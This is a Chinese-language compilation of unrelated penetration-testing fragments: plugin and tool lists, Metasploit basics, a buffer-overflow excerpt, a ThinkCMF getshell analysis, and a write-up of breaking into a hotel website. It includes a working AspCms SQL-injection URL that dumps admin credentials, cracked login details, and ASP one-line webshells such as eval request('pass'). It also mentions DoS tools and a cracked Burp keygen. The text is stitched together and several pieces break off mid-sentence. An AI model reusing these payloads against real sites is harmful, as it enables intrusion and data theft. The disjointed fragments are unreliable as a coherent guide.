渗透测试

在吐司看到这么一篇文章，信息安全从业者(我个人觉得他所指的更多是渗透测试工程师,毕竟那些经理并不做技术也是信息安全从业者，他们就有很好的从业出路)的出路在哪里？ 讲真的，这个话题我觉得是非常多渗透测试工程师们去思考的问题； 经过我深思熟虑，得出如下两个字： 转行 来源： https://www.cnblogs.com/nul1/p/11923941.html

目前很多插件不支持 Firefox 3.5 哦 1、Add N Edit Cookies 查看和修改本地的Cookie，Cookie欺骗必备。 下载： http://code.google.com/p/editcookie/downloads/list 2、User Agent Switcher 修改浏览器的User Agent，可以用来XSS。 下载： https://addons.mozilla.org/zh-CN/firefox/addon/59 3、RefControl 修改Referer引用，也可以用来XSS或者突破一些防盗 链。 下载： https://addons.mozilla.org/zh-CN/firefox/addon/953 4、Live HTTP Headers 记录本地的Get和Post数据，并可修改数据后重新提交。 下载： https://addons.mozilla.org/zh-CN/firefox/addon/3829 5、Poster 用来Post和Get数据。 下载： https://addons.mozilla.org/fr/firefox/addon/2691 6、HackBar 小工具包，包含一些常用的工具。(SQL injection,XSS,加密等) 下载： http://devels-playground.blogspot.com

这是某个国际酒店的网站，由于使用了AspCms 2.0，通过SQL注入我们很快可以拿下shell 此次测试中，由于网站限制了所有的读写权限，由各种错误，以及最后的小马根本没什么权限。 0x01 基础信息： 简单看看指纹信息： 是ASPCMS的，通过一个通用SQL注入拿到管理员的账号密码： EXP: https://blog.dyboy.cn/plug/comment /commentList.asp?id=0%20unmasterion%20 semasterlect%20top%201%20UserID,GroupID, LoginName,Password,now%28%29,null,1%20%20 frmasterom%20%7bprefix%7duser 利用EXP直接获得： 解密得到管理员 账号： admin 密码： 123456 0x02 深入测试： 后台默认为： https://blog.dyboy.cn/admin_aspcms/ 登陆管理后台 根据以前的添加模版的方法不可行，再多看几下，发现整个网站是没有写入权限的… 这里要提一个东西就是 aspcms 默认的留言板数据库路径： https://blog.dyboy.cn/data/data.asp 有的我们在留言板留言一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾 密码：a 菜刀连接 https://blog.dyboy

编译型应用程序与应用程序架构攻防 孟飞阳 20120228 13、攻击编译型应用程序 13.1 缓冲区溢出漏洞 如果应用程序将用户可控制的数据复制到一个不足以容纳他们的内存缓存区，就会出现缓冲区溢出漏洞。由于目标缓冲区溢出，导致邻近的内存被用户数据覆写。攻击者可以根据漏洞的本质利用它在服务器上运行任意代码或执行其他未授权操作。多年来，缓冲区溢出漏洞一直在本地软件中普遍存在，并被视为本地软件开发者必须避免的“头号公敌”。 13.1.1 栈溢出 如果应用程序在未确定大小固定的缓冲区容量足够大之前，就使用一个无限制的复制操作（如C语言中的Strcpy）将一个大小可变的缓冲区复制到另一个大小固定的缓冲区中，往往就会造成缓冲区溢出。例如，下面的函数将字符串username复制到一个分配到栈上的大小固定的缓冲区中： bool CheckLogin(Char* username,char* password){ char _username[32]; strcpy(_username,username); ... } 如果字符串username超过32字符，_username缓冲区就会溢出，攻击者将覆写邻近内存中的数据。在成功利用栈缓冲区溢出漏洞的攻击中，攻击者通常能够覆写栈上已保存的返回地址。当调用CheckLogin函数时，处理器将调用函数后执行的指令地址写入栈

渗透测试基础 知识科普 脚本（asp ,php, jsp) html(css,js,html) HTTP协议 cms(B/S) MD5 肉鸡 抓鸡 Webshell 漏洞 一句话【木马】 提权 后门 跳板 旁站入侵 C段入侵 扫描1-255 全部网段的网站CMS情况 选择自己擅长入侵的CMS，这样才能更快速的实现C段入侵 扫描1-255全部网段的端口开放情况 先查询端口，选择自己擅长提权的网站来入侵，痛过端口提权 使用到的工具椰树，阿D网络工具包、 黑盒测试 黑盒测试不同于黑客入侵，并不等于黑站。黑盒测试考验的是综合的能力（OS、Datebase、Script、code、思路、社工） 白盒测试 ：相对于黑盒测试，白盒测试基本是从内部发起的 灰盒测试：基于白盒测试与黑盒测试之间的一种产物 渗透测试介绍 渗透测试流程 明确目标 确定范围 确定规则 确定需求 信息收集 基础信息 系统信息 应用信息 版本信息 服务信息 人员信息 防护信息 漏洞探测 系统漏洞 Websever漏洞 web应用漏洞 其他服务端口漏洞 通信安全 漏洞验证 自动化验证 手工验证 登录猜测 业务漏洞验证 公开资源的利用 形成报告 按需整理 补充介绍 修补建议 信息整理 获取所需 整理渗透工具 整理收集信息 整理漏洞信息 信息分析 精确打击 绕过防御机制 定制攻击路径 绕过检测机制 攻击代码 信息搜集是关键

近段时间发现很多APP程序用的是thinkcmf,此程序源码存在getshell漏洞,我们Sine安全紧急对此高危漏洞进行了分析和漏洞修复,攻击者可以通过构造特定的请求包get请求即可在远程服务器上执行任意脚本代码。 根据index.php中的配置，项目路径为application，打开 Portal 下的 Controller 目录，选择一个控制类文件。 发现他的父类为Common\Controller\HomebaseController。 在HomeBaseController中加入如下测试代码 ThinkPHP是一套基于MVC的应用程序框架，被分成三个核心部件：模型（M）、视图（V）、控制器（C）。 由于添加的代码在控制器中，根据ThinkPHP框架约定可以通过a参数来指定对应的函数名，但是该函数的修饰符必须为Public, 而添加的代码正好符合该条件。 可以通过如下URL进行访问，并且可以添加GET参数arg1传递给函数。 cmfx-master/?a=test_public&arg1=run%20success HomeBaseController类中有一些访问权限为public的函数，重点关注display函数.看描述就是可以自定义加载模版，通过$this->parseTemplate 函数根据约定确定模版路径，如果不符合原先的约定将会从当前目录开始匹配。

术语 测试者利用系统程序或服务的漏洞进行攻击的一个过程——渗透攻击（exploit），攻击载荷（payload） 攻击者在目标系统上执行的一段代码，该代码具有反弹链接，创建用户、执行其他系统命令的功能。 shellcode 在目标机器上运行的一段机器指令，成功执行后会返回一个shell 模块（module） 指metasploit框架中所使用的一段软件代码组件 运行 msfconsole service postgresql start service metasploit start msfconsole 输入db_status 查看数据库连接状态 workspace –a test 创建一个工作台 删除 –d 选项 进入test工作台 Wordspace test 使用nmap db_nmap –sS 192.168.1.1 扫描主机 db_export 1.xml 导出扫描结果 db_inport 1.xml 导入扫描结果 hosts 查看扫描结果 ~#/etc/init.d/postgresql start ~#su –postgres createuser msf –p created –owher=msf msf3 exit 信息搜集 whois查询 msf>whois example.com msf>whois 192.168.1.1 msf>use

1.1 一些前置知识（包含但不限于） 脚本（asp、php、jsp） html（css、js、html） HTTP协议 CMS（B/S） 1.2 肉鸡 被黑客入侵并被长期驻扎的计算机或服务器。可以随意控制，可以是任意系统的设备，对象可以是企业，个人，政府等等所有单位。 1.3 抓鸡 利用使用量大的程序的漏洞，使用自动化方式获取肉鸡的行为。 1.4 Webshell 通过Web入侵的一种脚本工具，可以据此对网站服务进行一定程度的控制。 1.5 漏洞 硬件、软件、协议等等的可利用安全缺陷，可能被攻击者利用，对数据进行篡改，控制等。 1.6 木马 通过向服务端提交一句简短的代码，配合本地客户端实现webshell功能的木马。 <%eval request(“pass”)%> <%execute(request(“pass”))%> request(“pass”)接收客户端提交的数据，pass为执行命令的参数值。 eval/execute 函数执行客户端命令的内容 1.7 提权 操作系统低权限的账户将自己提升为管理员权限使用的方法。 1.8 后门 黑客为了对主机进行长期的控制，在机器上种植的一段程序或留下的一个”入口”。 1.9 跳板 使用肉鸡IP来实施攻击其他目标，以便更好的隐藏自己的身份信息。 1.10 旁站入侵 即同服务器下的网站入侵

漏洞扫描工具：openvas,nessus 压力测试工具：LOIC低轨道离子炮，Siege DNS伪造：DNSCheF, 端口扫描工具：nmap, 抓包工具：wireshark SQL 注入工具：sql-injection,SQLMap,Pangolin,Bsql hacker,Havij,The Mole web目录探测：DirBuster,wwwscan,御剑后台扫描，skipfish， 自动化web应用程序安全从测试工具：AWVS即wvs，AppScan,webshag,websecurify，vega css跨站脚本：Burp Suite,xss shell,XSS Platform, CSRF跨站点请求伪造; CSRFTEST 暴力破解：Hydra,DirBuster ARP欺骗攻击：Ettercap，NetFuke 拒绝服务攻击:hulk，Scapy 漏洞利用工具：号称可以黑出屎的工具Metasploit,w3af 密码破解工具：Johnny,hashcat,oclHashcat,chntpw 中间人攻击：Driftnet web应用代理：ProxyStrike 来源： oschina 链接： https://my.oschina.net/u/2460176/blog/596164

Google浏览器插件---SwitchyOmega Firefox浏览器插件---SwitchyOmega hosts代理工具---SwitchHosts【右击使用管理员权限打开】 双击burp-loader-keygen.jar，运行burpsuite Https请求设置 　　在使用Burp Suite对Https进行拦截时会提示不是私密连接或此连接不信任，Burp默认只能抓Http请求，Https因为包含证书，因此不能抓取，需要设置可信证书。 　　注： SwitchHosts切换代理环境时，Burpsuite会存在缓存时间，大概5分钟，如想设置的代理马上生效，可以将Burpsuite关闭重新打开。 Foxfire 导入证书 　　1. 在浏览器中输入http://localhost:8080或http://burp，点击页面右上角的CA Certificate，下载本地Burp证书（cacert.der） 　　2. Foxfire首选项->高级->证书->查看证书->证书机构->导入，选择cacert.der文件 代理 　　1. 在Foxfire浏览器中输入about:addons，进入附加组件列表页面； 　　2. 选择“扩展”，在搜索框中输入SwitchyOmega，点击安装； 　　3. 安装成功后，点击SwitchyOmega的图标，选项，输入代理信息。 Chrome